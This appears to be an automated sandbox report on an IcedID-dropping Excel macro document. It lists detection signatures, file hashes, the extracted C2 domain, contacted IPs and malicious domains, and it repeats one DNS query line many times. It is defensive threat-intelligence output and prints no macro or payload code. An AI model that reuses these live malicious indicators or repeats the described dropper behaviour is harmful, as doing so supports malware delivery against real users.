Analysis Report document-1251000362.xlsm

Overview

General Information

Sample Name: document-1251000362.xlsm
Analysis ID: 382870
MD5: 09217c79f99bbfe977a80d83d62489c7
SHA1: da600d355dfb57190a5745342f3cfeb7d1e509f1
SHA256: 7bf8049e4766a2985851a3d3bf01710c53c389fe1e54397fa332672b62b649d8

Detection

Hidden Macro 4.0 IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Outdated Microsoft Office dropper detected
Performs DNS queries to domains with low reputation
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapter information
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses insecure TLS / SSL version for HTTPS connection

Classification

AV Detection:

Found malware configuration
Source: 3.2.rundll32.exe.390000.0.raw.unpack Malware Configuration Extractor: IcedID {"C2 url": "usaaforced.fun"}
Multi AV Scanner detection for submitted file
Source: document-1251000362.xlsm Metadefender: Detection: 13%
Yara detected IcedID
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49172 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 3003[1].gif.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: metaflip.io
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.185.48.186:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.185.48.186:443

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: usaaforced.fun
Outdated Microsoft Office dropper detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE DNS query: agenbolatermurah.com is down
Performs DNS queries to domains with low reputation
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 50.87.146.86
Source: Joe Sandbox View IP Address: 199.79.62.99
Source: Joe Sandbox View IP Address: 192.185.214.87
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFB60433.png
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: metaflip.io
Source: rundll32.exe, 00000007.00000003.2176468982.00000000003B7000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp String found in binary or memory: http://crl.rootca1.a
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: rundll32.exe, 00000007.00000003.2176468982.00000000003B7000.00000004.00000001.sdmp String found in binary or memory: http://crt.comod
Source: rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crt.rootca1.am
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
